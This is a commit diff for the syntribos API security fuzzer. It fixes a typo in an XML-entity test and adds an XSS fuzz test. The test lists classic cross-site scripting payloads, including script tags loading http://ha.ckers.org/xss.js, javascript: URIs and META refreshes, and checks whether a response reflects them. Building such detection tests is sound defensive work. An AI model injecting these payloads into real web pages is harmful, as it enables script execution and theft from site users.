summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
-rw-r--r--syntribos/tests/fuzz/xml_external.py2
-rw-r--r--syntribos/tests/fuzz/xss.py82
2 files changed, 83 insertions, 1 deletions
diff --git a/syntribos/tests/fuzz/xml_external.py b/syntribos/tests/fuzz/xml_external.py
index 6eb8886..b4dd18c 100644
--- a/syntribos/tests/fuzz/xml_external.py
+++ b/syntribos/tests/fuzz/xml_external.py
@@ -49,7 +49,7 @@ class XMLExternalEntityBody(base_fuzz.BaseFuzzTestCase):
49 text=("A string known to be commonly returned after a " 49 text=("A string known to be commonly returned after a "
50 "successful XML external entity attack was included " 50 "successful XML external entity attack was included "
51 "in the response. This could indicate a " 51 "in the response. This could indicate a "
52 "vulnerability to XML entity attacks attacks."), 52 "vulnerability to XML entity attacks."),
53 assertions=self.data_driven_failure_cases())) 53 assertions=self.data_driven_failure_cases()))
54 self.test_issues() 54 self.test_issues()
55 55
diff --git a/syntribos/tests/fuzz/xss.py b/syntribos/tests/fuzz/xss.py
new file mode 100644
index 0000000..b05b85c
--- /dev/null
+++ b/syntribos/tests/fuzz/xss.py
@@ -0,0 +1,82 @@
1"""
2Copyright 2016 Rackspace
3
4Licensed under the Apache License, Version 2.0 (the "License");
5you may not use this file except in compliance with the License.
6You may obtain a copy of the License at
7
8 http://www.apache.org/licenses/LICENSE-2.0
9
10Unless required by applicable law or agreed to in writing, software
11distributed under the License is distributed on an "AS IS" BASIS,
12WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13See the License for the specific language governing permissions and
14limitations under the License.
15"""
16
17from syntribos.issue import Issue
18from syntribos.tests.fuzz import base_fuzz
19
20
21class XSSBody(base_fuzz.BaseFuzzTestCase):
22 test_name = "XSS_BODY"
23 test_type = "data"
24 data_key = "xss.txt"
25 failure_keys = [
26 """<SCRIPT>alert('XSS');</SCRIPT>""",
27 """<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
28 """<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
29 """<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
30 """<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
31 """<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
32 """<IMG SRC="javascript:alert('XSS');">""",
33 """<IMG SRC=javascript:alert('XSS')>""",
34 """<IMG SRC=JaVaScRiPt:alert('XSS')>""",
35 """<IMG SRC=javascript:alert(&quot;XSS&quot;)>""",
36 """<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>""",
37 """<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>""",
38 """<IMG DYNSRC="javascript:alert('XSS')">""",
39 """<IMG LOWSRC="javascript:alert('XSS')">""",
40 """<DIV STYLE="background-image: url(javascript:alert('XSS'))">""",
41 """<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">""",
42 """<DIV STYLE="width: expression(alert('XSS'));">""",
43 """<META HTTP-EQUIV="refresh"
44 CONTENT="0;url=javascript:alert('XSS');">""",
45 """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,
46 PHNjcmlwdD5hbGVydCgnWFNJyk8L3NjcmlwdD4K">""",
47 """<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>;
48 REL=stylesheet">""",
49 """<META HTTP-EQUIV="refresh" CONTENT="0;
50 URL=http://;URL=javascript:alert('XSS');">""",
51 """<STYLE TYPE="text/javascript">alert('XSS');</STYLE>""",
52 """<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE>
53 <A CLASS=XSS></A>""",
54 """<STYLE type="text/css">
55 BODY{background:url("javascript:alert('XSS')")}</STYLE>""",
56 """<BASE HREF="javascript:alert('XSS');//">""",
57 """<OBJECT TYPE="text/x-scriptlet"
58 DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>""",
59 """<OBJECT classid=clsid:ae24fdae-03c6-8b6-80c44f3>
60 <param name=url value=javascript:alert('XSS')></OBJECT>""",
61 """<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>"""]
62
63 def data_driven_failure_cases(self):
64 failure_assertions = []
65 if self.failure_keys is None:
66 return []
67 for line in self.failure_keys:
68 failure_assertions.append((self.assertNotIn,
69 line, self.resp.content))
70 return failure_assertions
71
72 def test_case(self):
73 if 'html' in self.resp.headers:
74 self.register_issue(
75 Issue(test="xss_strings",
76 severity="High",
77 text=("A string known to be commonly returned after a "
78 "successful XSS attack was included "
79 "in the response. This could indicate a "
80 "XSS vulnerability"),
81 assertions=self.data_driven_failure_cases()))
82 self.test_issues()